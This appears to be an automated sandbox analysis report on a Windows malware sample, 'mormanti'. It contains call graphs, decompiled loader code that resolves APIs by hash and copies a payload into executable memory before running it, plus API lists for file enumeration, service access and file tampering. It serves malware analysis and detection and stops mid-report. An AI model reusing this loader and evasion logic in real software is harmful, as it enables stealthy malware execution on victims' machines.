7319 2db5dab 7316->7319 7434 2db093f 7316->7434 7318->7247 7320 2db283f GetPEB 7319->7320 7320->7318 7325 2db700a 7321->7325 7322 2db7065 7322->7247 7323 2db289d GetPEB 7323->7325 7325->7322 7325->7323 7326 2db283f GetPEB 7325->7326 7441 2db2933 7325->7441 7326->7325 7332 2db5a99 7327->7332 7328 2db5bc8 7328->7247 7329 2db5bca 7330 2db283f GetPEB 7329->7330 7330->7328 7331 2db283f GetPEB 7331->7332 7332->7328 7332->7329 7332->7331 7334 2db28f5 GetPEB 7333->7334 7335 2db1ee7 7334->7335 7335->7247 7337 2db28f5 GetPEB 7336->7337 7339 2db0f48 7337->7339 7338 2db0f8e 7338->7247 7339->7338 7444 2db1682 7339->7444 7342 2db0f7e 7342->7247 7343 2db289d GetPEB 7343->7338 7350 2db3ea8 7344->7350 7345 2db28f5 GetPEB 7345->7350 7346 2db289d GetPEB 7346->7350 7347 2db4040 7347->7247 7349 2db283f GetPEB 7349->7350 7350->7345 7350->7346 7350->7347 7350->7349 7451 2db2f39 7350->7451 7354 2db70da 7351->7354 7352 2db28f5 GetPEB 7352->7354 7353 2db713a 7353->7247 7354->7352 7354->7353 7357 2db523c 7355->7357 7356 2db1f3c GetPEB 7356->7357 7357->7356 7358 2db283f GetPEB 7357->7358 7359 2db53b0 7357->7359 7361 2db53ae 7357->7361 7362 2db289d GetPEB 7357->7362 7358->7357 7360 2db283f GetPEB 7359->7360 7360->7361 7361->7247 7362->7357 7364 2db283f GetPEB 7363->7364 7365 2db2c3a 7364->7365 7366 2db283f GetPEB 7365->7366 7367 2db2c4f 7366->7367 7367->7247 7370 2db7198 7368->7370 7369 2db71f8 7369->7247 7370->7369 7457 2db69bb 7370->7457 7466 2db6d44 7370->7466 7375 2db5c06 7373->7375 7374 2db5c39 7376 2db283f GetPEB 7374->7376 7375->7374 7377 2db283f GetPEB 7375->7377 7380 2db5c6f 7375->7380 7378 2db5c5d 7376->7378 7377->7375 7379 2db283f GetPEB 7378->7379 7379->7380 7380->7247 7385 2db5f14 7381->7385 7383 2db283f GetPEB 7383->7385 7384 2db5fc1 7384->7247 7385->7383 7385->7384 7507 2db2ba7 7385->7507 7514 2db2c59 7385->7514 7392 2db59e1 7387->7392 7388 2db2ea3 GetPEB 7388->7392 7389 2db1f3c GetPEB 7389->7392 7390 2db5a73 7390->7230 7391 2db283f GetPEB 7391->7392 7392->7388 7392->7389 7392->7390 7392->7391 7393 2db289d GetPEB 7392->7393 7393->7392 7404 2db5580 7394->7404 7395 2db5a85 GetPEB 7395->7404 7397 2db56ad 7397->7230 7398 2db56af 7399 2db283f GetPEB 7398->7399 7400 2db56ca 7399->7400 7403 2db283f GetPEB 7400->7403 7401 2db1f3c GetPEB 7401->7404 7402 2db283f GetPEB 7402->7404 7403->7397 7404->7395 7404->7397 7404->7398 7404->7401 7404->7402 7405 2db20f1 GetPEB 7404->7405 7406 2db289d GetPEB 7404->7406 7517 2db4cc0 7404->7517 7405->7404 7406->7404 7408 2db2873 GetPEB 7407->7408 7409 2db210b 7408->7409 7410 2db2873 GetPEB 7409->7410 7411 2db211c 7410->7411 7412 2db2873 GetPEB 7411->7412 7413 2db2128 7412->7413 7414 2db283f GetPEB 7413->7414 7415 2db214b 7414->7415 7416 2db283f GetPEB 7415->7416 7417 2db2164 7416->7417 7418 2db283f GetPEB 7417->7418 7419 2db21a1 7418->7419 7419->7251 7421 2db1f3c GetPEB 7420->7421 7422 2db20a2 7421->7422 7423 2db283f GetPEB 7422->7423 7424 2db20c3 7423->7424 7425 2db289d GetPEB 7424->7425 7426 2db20d0 7425->7426 7427 2db283f GetPEB 7426->7427 7428 2db20e8 7427->7428 7428->7251 7430 2db283f GetPEB 7429->7430 7431 2db3539 7430->7431 7432 2db283f GetPEB 7431->7432 7433 2db3587 7431->7433 7432->7433 7433->7291 7438 2db0953 7434->7438 7435 2db09c1 7437 2db283f GetPEB 7435->7437 7436 2db283f GetPEB 7436->7438 7439 2db09bf 7437->7439 7438->7435 7438->7436 7438->7439 7440 2db28f5 GetPEB 7438->7440 7439->7316 7440->7438 7442 2db283f GetPEB 7441->7442 7443 2db294f 7442->7443 7443->7325 7449 2db1693 7444->7449 7445 2db283f GetPEB 7445->7449 7446 2db1843 7447 2db289d GetPEB 7446->7447 7448 2db0f7a 7447->7448 7448->7342 7448->7343 7449->7445 7449->7446 7449->7448 7450 2db28f5 GetPEB 7449->7450 7450->7449 7456 2db2f51 7451->7456 7452 2db302e 7453 2db283f GetPEB 7452->7453 7455 2db302c 7453->7455 7454 2db283f GetPEB 7454->7456 7455->7350 7456->7452 7456->7454 7456->7455 7458 2db69d0 7457->7458 7459 2db2933 GetPEB 7458->7459 7460 2db28f5 GetPEB 7458->7460 7461 2db6af5 7458->7461 7462 2db6ae0 7458->7462 7464 2db283f GetPEB 7458->7464 7474 2db2953 7458->7474 7459->7458 7460->7458 7463 2db289d GetPEB 7461->7463 7462->7370 7463->7462 7464->7458 7469 2db6d5c 7466->7469 7470 2db6e01 7469->7470 7472 2db28f5 GetPEB 7469->7472 7473 2db6d83 7469->7473 7490 2db2ea3 7469->7490 7499 2db6e0f 7469->7499 7471 2db289d GetPEB 7470->7471 7471->7473 7472->7469 7473->7370 7475 2db2964 7474->7475 7476 2db283f GetPEB 7475->7476 7478 2db2a3a 7475->7478 7477 2db298f 7476->7477 7477->7478 7479 2db28d1 GetPEB 7477->7479 7478->7458 7482 2db29bf 7479->7482 7480 2db2a05 7486 2db2a75 7480->7486 7481 2db28d1 GetPEB 7481->7482 7482->7480 7482->7481 7485 2db283f GetPEB 7485->7478 7487 2db2a8d 7486->7487 7488 2db2a1a 7486->7488 7487->7488 7489 2db283f GetPEB 7487->7489 7488->7478 7488->7485 7489->7487 7491 2db2873 GetPEB 7490->7491 7492 2db2ebc 7491->7492 7493 2db283f GetPEB 7492->7493 7494 2db2eea 7493->7494 7495 2db283f GetPEB 7494->7495 7498 2db2ef8 7494->7498 7496 2db2f1b 7495->7496 7497 2db283f GetPEB 7496->7497 7497->7498 7498->7469 7504 2db6e2b 7499->7504 7500 2db6fd7 7501 2db283f GetPEB 7500->7501 7503 2db6fd5 7501->7503 7502 2db1f3c GetPEB 7502->7504 7503->7469 7504->7500 7504->7502 7504->7503 7505 2db283f GetPEB 7504->7505 7506 2db289d GetPEB 7504->7506 7505->7504 7506->7504 7508 2db283f GetPEB 7507->7508 7509 2db2bd4 7508->7509 7510 2db2c0e 7509->7510 7511 2db283f GetPEB 7509->7511 7510->7385 7512 2db2bf7 7511->7512 7513 2db283f GetPEB 7512->7513 7513->7510 7515 2db2f39 GetPEB 7514->7515 7516 2db2c6e 7515->7516 7516->7385 7519 2db4cd8 7517->7519 7518 2db1f3c GetPEB 7518->7519 7519->7518 7520 2db283f GetPEB 7519->7520 7521 2db4d08 7519->7521 7522 2db4d1c 7519->7522 7524 2db289d GetPEB 7519->7524 7520->7519 7523 2db283f GetPEB 7521->7523 7522->7404 7523->7522 7524->7519 7746 2dc2437 7752 2dc2455 7746->7752 7747 2dc2534 7748 2dc2f00 GetPEB 7747->7748 7749 2dc2532 7748->7749 7750 2dc2fb6 2 API calls 7750->7752 7751 2dc2f00 GetPEB 7751->7752 7752->7747 7752->7749 7752->7750 7752->7751 7529 2db64b5 7530 2db64b8 7529->7530 7531 2db283f GetPEB 7530->7531 7532 2db65ab 7530->7532 7531->7530 7756 c12a2e 7757 c12a43 _exit 7756->7757 7758 c12a4a 7756->7758 7757->7758 7759 c12a52 _cexit 7758->7759 7760 c12a58 __onexit 7758->7760 7759->7760 7761 2dc412c 7762 2dc412f 7761->7762 7763 2dc2fb6 2 API calls 7762->7763 7765 2dc4145 7763->7765 7764 2dc4168 7765->7764 7766 2dc2f5e GetPEB 7765->7766 7766->7764 7533 2db2caa 7534 2db2cba 7533->7534 7535 2db2d82 7534->7535 7536 2db2d80 7534->7536 7538 2db283f GetPEB 7534->7538 7537 2db283f GetPEB 7535->7537 7537->7536 7538->7534 7767 2dc772f 7768 2dc7742 7767->7768 7769 2dc7777 7768->7769 7770 2dc445f 2 API calls 7768->7770 7771 2dc774e 7770->7771 7772 2dc2577 2 API calls 7771->7772 7773 2dc7761 7772->7773 7774 2dc2f5e GetPEB 7773->7774 7774->7769 7539 c133b8 7540 c11be1 2 API calls 7539->7540 7541 c133c2 7540->7541 7542 c1283f 10 API calls 7541->7542 7543 c133cc 7542->7543 7775 c11e3d 7778 c110ed 7775->7778 7777 c11e49 7782 c130b8 7778->7782 7780 c110f9 ??0exception@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 7781 c11126 7780->7781 7781->7777 7782->7780 7550 2db4fa5 7551 2db4fa8 7550->7551 7552 2db283f GetPEB 7551->7552 7553 2db4ff6 7551->7553 7555 2db5019 7551->7555 7552->7551 7554 2db283f GetPEB 7553->7554 7554->7555 7556 c132bf 7557 c1272c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 7 API calls 7556->7557 7558 c132d0 7557->7558 7559 2db2da4 7566 2db2dbb 7559->7566 7560 2db2df6 7561 2db2873 GetPEB 7561->7566 7562 2db2ddf 7564 2db283f GetPEB 7562->7564 7563 2db283f GetPEB 7563->7566 7564->7560 7565 2db1f3c GetPEB 7565->7566 7566->7560 7566->7561 7566->7562 7566->7563 7566->7565 7567 2db289d GetPEB 7566->7567 7567->7566

                                                                                                Executed Functions

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 71%
                                                                                                			E00C121FD(void* __edx, struct HACCEL__* _a4, intOrPtr _a16) {
                                                                                                				signed int _v8;
                                                                                                				void _v60;
                                                                                                				void* _v64;
                                                                                                				signed short _v68;
                                                                                                				intOrPtr _v72;
                                                                                                				struct HACCEL__* _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				intOrPtr _v84;
                                                                                                				struct tagMSG _v112;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t29;
                                                                                                				int _t32;
                                                                                                				signed int _t34;
                                                                                                				struct HACCEL__* _t37;
                                                                                                				void* _t44;
                                                                                                				intOrPtr _t45;
                                                                                                				struct HACCEL__* _t47;
                                                                                                				struct HACCEL__* _t62;
                                                                                                				signed int _t77;
                                                                                                				void* _t83;
                                                                                                				void* _t90;
                                                                                                				signed int _t91;
                                                                                                
                                                                                                				_t83 = __edx;
                                                                                                				_t29 =  *0xc16018; // 0x649a0353
                                                                                                				_v8 = _t29 ^ _t91;
                                                                                                				_v76 = _a4;
                                                                                                				_v68 = 0x442c83;
                                                                                                				_t32 = LoadLibraryExA("schtasks.exe", 0, 0); // executed
                                                                                                				if(_t32 != 0) {
                                                                                                					_v68 = 0xcfdb;
                                                                                                					 *0xc16034 = 0x5887;
                                                                                                				}
                                                                                                				do {
                                                                                                					__imp___time64(0);
                                                                                                					srand(_t32);
                                                                                                					_t34 = rand() & 0x80000003;
                                                                                                					if(_t34 < 0) {
                                                                                                						_t34 = (_t34 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                					}
                                                                                                					_t32 = _t34 + 1;
                                                                                                				} while (_t32 <= 3);
                                                                                                				_t77 = 0xc;
                                                                                                				memcpy( &_v60, "0WmfLjNQIqUtwtvadlxNXC?y~xbeK~$uLkOQa%?~Wj4a3#Lu", _t77 << 2);
                                                                                                				asm("movsb");
                                                                                                				_t89 = E00C11FF2();
                                                                                                				_t37 = E00C12047(_t36, 0x1e27f4fd);
                                                                                                				_t87 = _t37;
                                                                                                				_v64 = E00C12047(_t36, 0xbce8a04f);
                                                                                                				_v80 = E00C12047(_t36, 0x5e97c023);
                                                                                                				_v84 = E00C12047(_t89, 0x355a1f6f);
                                                                                                				_v72 = E00C12047(_t89, 0x5b9200a9);
                                                                                                				_t90 = _t37->i(0, _v68 & 0x0000ffff, 0xa);
                                                                                                				if(_t90 != 0) {
                                                                                                					_t44 = _v64(0, _t90);
                                                                                                					_v64 = _t44;
                                                                                                					if(_t44 == 0) {
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					_t47 = _v80(0, _t90);
                                                                                                					_t87 = _t47;
                                                                                                					_t90 = _v84(_v72(0, _t87, atoi("4096") | 0x00002000, 0x40, 0));
                                                                                                					if(_t90 == 0) {
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					memcpy(_t90, _v64, _t87);
                                                                                                					E00C120CD();
                                                                                                					 *_t90(_t90, _t87,  &_v60, _t90);
                                                                                                					_t87 = _v76;
                                                                                                					_t90 = LoadStringW;
                                                                                                					LoadStringW(_t87, 0x67, 0xc164d8, 0x64);
                                                                                                					LoadStringW(_t87, 0x6d, 0xc16410, 0x64);
                                                                                                					E00C123C4(_t87);
                                                                                                					if(E00C12435(_t87, _a16) == 0) {
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						_t62 = LoadAcceleratorsW(_t87, 0x6d);
                                                                                                						_t90 = GetMessageW;
                                                                                                						_t87 = _t62;
                                                                                                						while(GetMessageW( &_v112, 0, 0, 0) != 0) {
                                                                                                							if(TranslateAcceleratorW(_v112, _t87,  &_v112) == 0) {
                                                                                                								TranslateMessage( &_v112);
                                                                                                								DispatchMessageW( &_v112);
                                                                                                							}
                                                                                                						}
                                                                                                						E00C111BA();
                                                                                                						_t45 = _v112.wParam;
                                                                                                						L15:
                                                                                                						return E00C1272C(_t45, 0, _v8 ^ _t91, _t83, _t87, _t90);
                                                                                                					}
                                                                                                				}
                                                                                                				L6:
                                                                                                				_t45 = 0;
                                                                                                				goto L15;
                                                                                                			}



























                                                                                                0x00c121fd
                                                                                                0x00c12203
                                                                                                0x00c1220a
                                                                                                0x00c1221c
                                                                                                0x00c1221f
                                                                                                0x00c12226
                                                                                                0x00c1222e
                                                                                                0x00c12230
                                                                                                0x00c12237
                                                                                                0x00c12237
                                                                                                0x00c12241
                                                                                                0x00c12242
                                                                                                0x00c12249
                                                                                                0x00c12257
                                                                                                0x00c1225c
                                                                                                0x00c12262
                                                                                                0x00c12262
                                                                                                0x00c12263
                                                                                                0x00c12264
                                                                                                0x00c1226b
                                                                                                0x00c12274
                                                                                                0x00c12276
                                                                                                0x00c1227c
                                                                                                0x00c12283
                                                                                                0x00c1228d
                                                                                                0x00c12299
                                                                                                0x00c122a6
                                                                                                0x00c122b3
                                                                                                0x00c122be
                                                                                                0x00c122cb
                                                                                                0x00c122cf
                                                                                                0x00c122da
                                                                                                0x00c122dd
                                                                                                0x00c122e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c122e6
                                                                                                0x00c122f1
                                                                                                0x00c12309
                                                                                                0x00c1230d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c12314
                                                                                                0x00c12320
                                                                                                0x00c12328
                                                                                                0x00c1232a
                                                                                                0x00c1232d
                                                                                                0x00c1233d
                                                                                                0x00c12349
                                                                                                0x00c1234d
                                                                                                0x00c1235f
                                                                                                0x00000000
                                                                                                0x00c12365
                                                                                                0x00c12368
                                                                                                0x00c1236e
                                                                                                0x00c12374
                                                                                                0x00c1239e
                                                                                                0x00c12388
                                                                                                0x00c1238e
                                                                                                0x00c12398
                                                                                                0x00c12398
                                                                                                0x00c12388
                                                                                                0x00c123ab
                                                                                                0x00c123b0
                                                                                                0x00c123b3
                                                                                                0x00c123c1
                                                                                                0x00c123c1
                                                                                                0x00c1235f
                                                                                                0x00c122d1
                                                                                                0x00c122d1
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • LoadLibraryExA.KERNELBASE(schtasks.exe,00000000,00000000), ref: 00C12226
                                                                                                • _time64.MSVCR90 ref: 00C12242
                                                                                                • srand.MSVCR90 ref: 00C12249
                                                                                                • rand.MSVCR90 ref: 00C12251
                                                                                                • atoi.MSVCR90 ref: 00C122F3
                                                                                                • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00C12306
                                                                                                • memcpy.MSVCR90 ref: 00C12314
                                                                                                • LoadStringW.USER32(?,00000067,00C164D8,00000064), ref: 00C1233D
                                                                                                • LoadStringW.USER32(?,0000006D,00C16410,00000064), ref: 00C12349
                                                                                                • LoadAcceleratorsW.USER32 ref: 00C12368
                                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C12380
                                                                                                • TranslateMessage.USER32(?), ref: 00C1238E
                                                                                                • DispatchMessageW.USER32 ref: 00C12398
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C123A5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Message$StringTranslate$AcceleratorAcceleratorsAllocDispatchLibraryNumaVirtual_time64atoimemcpyrandsrand
                                                                                                • String ID: 0WmfLjNQIqUtwtvadlxNXC?y~xbeK~$uLkOQa%?~Wj4a3#Lu$4096$schtasks.exe
                                                                                                • API String ID: 1692861963-3368545145
                                                                                                • Opcode ID: 8c99ab0c7096f4e38d415a792dd8f07fdf6f288ca7c95037349106f49155464b
                                                                                                • Instruction ID: 10b977d3cb515a8d67673702935da28c695f4bb38f3c8e7a6f67b5b831b88493
                                                                                                • Opcode Fuzzy Hash: 8c99ab0c7096f4e38d415a792dd8f07fdf6f288ca7c95037349106f49155464b
                                                                                                • Instruction Fuzzy Hash: 4451B4B5D00218BBDB14ABB09C89FEE7ABCEF4B310F104425F911F7150DB748991AB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 485 2dc2871-2dc2885 486 2dc288a-2dc288c 485->486 487 2dc288d-2dc2892 486->487 488 2dc2a0f-2dc2a30 call 2dc2f00 FindNextFileW 487->488 489 2dc2898-2dc289d 487->489 498 2dc2a3c-2dc2a43 488->498 499 2dc2a32-2dc2a37 488->499 490 2dc2953-2dc295a 489->490 491 2dc28a3-2dc28a8 489->491 495 2dc29ef-2dc29f9 call 2dc2fb6 490->495 496 2dc2960-2dc2967 490->496 493 2dc28ae-2dc28b3 491->493 494 2dc2a51-2dc2a67 call 2dc2f00 FindClose 491->494 501 2dc2949-2dc294e 493->501 502 2dc28b9-2dc28be 493->502 516 2dc2a69-2dc2a6f 494->516 511 2dc29fc-2dc2a0a 495->511 503 2dc2969-2dc2971 496->503 504 2dc2990-2dc2992 496->504 505 2dc2a44-2dc2a49 498->505 499->486 501->487 507 2dc290f-2dc2939 call 2dc2f00 FindFirstFileW 502->507 508 2dc28c0-2dc28c5 502->508 509 2dc2986-2dc298b 503->509 510 2dc2973-2dc297a 503->510 504->509 512 2dc2994-2dc29ed call 2dc25fd call 2dc2f00 call 2dc2871 call 2dc2f5e 504->512 505->487 514 2dc2a4f 505->514 507->516 523 2dc293f-2dc2944 507->523 508->505 517 2dc28cb-2dc290a call 2dc25fd call 2dc2f00 call 2dc2f5e 508->517 509->487 510->504 518 2dc297c-2dc2984 510->518 511->486 512->509 514->516 517->486 518->504 518->509 523->486
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,2FF792F7), ref: 02DC2932
                                                                                                • FindNextFileW.KERNELBASE(?,?,?,?,2FF792F7), ref: 02DC2A2C
                                                                                                • FindClose.KERNELBASE(?,?,?,2FF792F7), ref: 02DC2A67
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: 2d0197225657cc5eb1236ce74a892b43bb9281e659f5c86845bd12f0e2e4aa6d
                                                                                                • Instruction ID: 2437ef56a54131250166d012995df1ef57e71214bf90725f079e01b59bf4f018
                                                                                                • Opcode Fuzzy Hash: 2d0197225657cc5eb1236ce74a892b43bb9281e659f5c86845bd12f0e2e4aa6d
                                                                                                • Instruction Fuzzy Hash: 8341492564821B6ADF38A5A49C4CBBE2265DB84324F30015EED19EB3C0DF71CEC5CA56
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 43 2dc388f-2dc38a8 44 2dc38aa 43->44 45 2dc38ad 44->45 46 2dc38b0 45->46 47 2dc38b3-2dc38b9 46->47 48 2dc39cc-2dc39d2 47->48 49 2dc38bf 47->49 50 2dc39d8-2dc39de 48->50 51 2dc3a95-2dc3aa3 call 2dc2fb6 48->51 52 2dc3979-2dc39c7 call 2dc2f00 * 2 49->52 53 2dc38c5-2dc38cb 49->53 54 2dc3a84-2dc3a8b call 2dc2f5e 50->54 55 2dc39e4-2dc39ea 50->55 72 2dc3aaf 51->72 73 2dc3aa5 51->73 79 2dc3ab4 52->79 58 2dc3961-2dc3974 53->58 59 2dc38d1-2dc38d7 53->59 54->51 61 2dc39ec-2dc39f3 55->61 62 2dc3a66-2dc3a7f call 2dc2fb6 55->62 58->47 65 2dc38d9-2dc38df 59->65 66 2dc3927-2dc395c call 2dc2f00 OpenServiceW 59->66 69 2dc39f9-2dc3a29 call 2dc2f00 61->69 70 2dc3ab7-2dc3abd 61->70 62->44 74 2dc3920-2dc3925 65->74 75 2dc38e1-2dc38e7 65->75 66->46 94 2dc3a2f-2dc3a61 call 2dc2f00 69->94 95 2dc3916 69->95 83 2dc3abf 70->83 84 2dc3acb-2dc3ad1 70->84 72->79 73->72 74->47 81 2dc38ed-2dc38f3 75->81 82 2dc3ac4-2dc3ac6 call 2dc2f5e 75->82 79->70 81->70 88 2dc38f9-2dc3913 call 2dc2f00 81->88 82->84 83->45 88->95 96 2dc391b-2dc391e 94->96 95->96 96->45
                                                                                                APIs
                                                                                                • OpenServiceW.ADVAPI32(?,?,00000001,00000000,1430A5A4,00000000,?,?,?,?,?,?,?,02DC5E1C), ref: 02DC3943
                                                                                                  • Part of subcall function 02DC2FB6: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,00000000,00000001,00000000,?,00000000,00000000), ref: 02DC2FE6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Offset: 02DC1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2dc1000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeapOpenService
                                                                                                • String ID: Q[L4$ddO#$ddO#$ddO#
                                                                                                • API String ID: 4051131143-3919308813
                                                                                                • Opcode ID: 16a90e73127847b2da0756759072ae951061bff6f254d1bace3a7ad4b2acc776
                                                                                                • Instruction ID: 0c73bee64da0b94a4175f84e9231dcb1d192bce92c9ac418e2ba57bd1c99b34f
                                                                                                • Opcode Fuzzy Hash: 16a90e73127847b2da0756759072ae951061bff6f254d1bace3a7ad4b2acc776
                                                                                                • Instruction Fuzzy Hash: 59514B32F482165BDB5CA69D8C847BDA2B39F84304F35819EDD55BB3D4DB61CD018BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 380 2db002d-2db009e call 2db0467 * 6 393 2db00a0-2db00a2 380->393 394 2db00a7-2db00b0 380->394 395 2db045f-2db0466 393->395 394->393 396 2db00b2-2db00b6 394->396 396->393 397 2db00b8-2db00c2 396->397 398 2db00e6-2db0107 GetNativeSystemInfo 397->398 399 2db00c4-2db00c7 397->399 398->393 401 2db0109-2db0133 VirtualAlloc 398->401 400 2db00c9-2db00cf 399->400 402 2db00d1-2db00d4 400->402 403 2db00d6 400->403 404 2db016c-2db0176 401->404 405 2db0135-2db013d 401->405 408 2db00d9-2db00e4 402->408 403->408 406 2db0178-2db017d 404->406 407 2db01b0-2db01c1 404->407 409 2db013f-2db0142 405->409 410 2db0181-2db0194 406->410 411 2db01c3-2db01dd 407->411 412 2db0240-2db024c 407->412 408->398 408->400 413 2db015d-2db015f 409->413 414 2db0144-2db014c 409->414 415 2db0196-2db019f 410->415 416 2db01a5-2db01aa 410->416 433 2db01df 411->433 434 2db022e-2db023a 411->434 417 2db02fc-2db0306 412->417 418 2db0252-2db0269 412->418 420 2db0161-2db0166 413->420 414->413 419 2db014e-2db0151 414->419 415->415 421 2db01a1 415->421 416->410 424 2db01ac 416->424 422 2db030c-2db0313 417->422 423 2db03c3-2db03df 417->423 418->417 425 2db026f-2db027f 418->425 427 2db0158-2db015b 419->427 428 2db0153-2db0156 419->428 420->409 429 2db0168 420->429 421->416 430 2db0315-2db031e 422->430 465 2db045d 423->465 466 2db03e1-2db03e5 423->466 424->407 431 2db02e1-2db02f2 425->431 432 2db0281-2db0285 425->432 427->420 428->413 428->427 429->404 437 2db03b8-2db03bd 430->437 438 2db0324-2db033e 430->438 431->425 435 2db02f8 431->435 439 2db0286-2db0295 432->439 441 2db01e3-2db01e7 433->441 434->411 436 2db023c 434->436 435->417 436->412 437->423 437->430 442 2db0358-2db035a 438->442 443 2db0340-2db0342 438->443 444 2db029d-2db02a6 439->444 445 2db0297-2db029b 439->445 446 2db01e9 441->446 447 2db0207-2db0210 441->447 452 2db035c-2db035e 442->452 453 2db0373-2db0375 442->453 448 2db034b-2db034e 443->448 449 2db0344-2db0349 443->449 451 2db02cf-2db02d3 444->451 445->444 450 2db02a8-2db02ad 445->450 446->447 455 2db01eb-2db0205 446->455 456 2db0213-2db0228 447->456 460 2db0350-2db0356 448->460 449->460 461 2db02af-2db02be 450->461 462 2db02c0-2db02c3 450->462 451->439 457 2db02d5-2db02dd 451->457 463 2db0360-2db0362 452->463 464 2db0364-2db0366 452->464 458 2db037c-2db0381 453->458 459 2db0377 453->459 455->456 456->441 468 2db022a 456->468 457->431 470 2db0384-2db03ae VirtualProtect 458->470 469 2db0379-2db037a 459->469 460->470 461->451 462->451 471 2db02c5-2db02cb 462->471 463->469 464->453 467 2db0368-2db036a 464->467 465->395 466->465 472 2db03e7-2db03f1 466->472 467->470 474 2db036c-2db0371 467->474 468->434 469->470 470->393 475 2db03b4 470->475 471->451 472->465 473 2db03f3-2db03f7 472->473 473->465 476 2db03f9-2db040a 473->476 474->470 475->437 476->465 477 2db040c-2db0411 476->477 478 2db0413-2db0420 477->478 478->478 479 2db0422-2db0426 478->479 480 2db0428-2db043a 479->480 481 2db043e-2db0444 479->481 480->477 482 2db043c 480->482 481->465 483 2db0446-2db045c 481->483 482->465 483->465
                                                                                                APIs
                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02DB0005), ref: 02DB00EB
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02DB0005), ref: 02DB0113
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2db0000_mormanti.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocInfoNativeSystemVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2032221330-0
                                                                                                • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                                                • Instruction ID: 4d3a58295b271655c2b8beb2221ea3d4c4d626a31f2330c9820a3588e05c635a
                                                                                                • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                                                • Instruction Fuzzy Hash: 23E1AE71A08306CFDB25CF59C8647AAB7E1BF8430AF18852DE8969B341E774EC45CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 537 2dc58e2-2dc58f8 538 2dc58fd-2dc58ff 537->538 539 2dc5900-2dc5905 538->539 540 2dc5a0f-2dc5a63 call 2dc25fd call 2dc2f00 call 2dc2f5e 539->540 541 2dc590b-2dc5910 539->541 563 2dc5a64-2dc5a69 540->563 543 2dc59fa-2dc5a0a call 2dc437a 541->543 544 2dc5916-2dc591b 541->544 543->538 547 2dc59ac-2dc59f5 call 2dc2f00 SetFileInformationByHandle 544->547 548 2dc5921-2dc5926 544->548 547->539 552 2dc598d-2dc59a7 call 2dc2f00 548->552 553 2dc5928-2dc592d 548->553 552->538 554 2dc5a71-2dc5a83 call 2dc2f00 553->554 555 2dc5933-2dc5938 553->555 571 2dc5a86-2dc5a8e 554->571 559 2dc593a-2dc593f 555->559 560 2dc5983-2dc5988 555->560 559->563 564 2dc5945-2dc5973 call 2dc2f00 CreateFileW 559->564 560->539 563->539 570 2dc5a6f 563->570 564->571 574 2dc5979-2dc597e 564->574 570->571 574->538
                                                                                                APIs
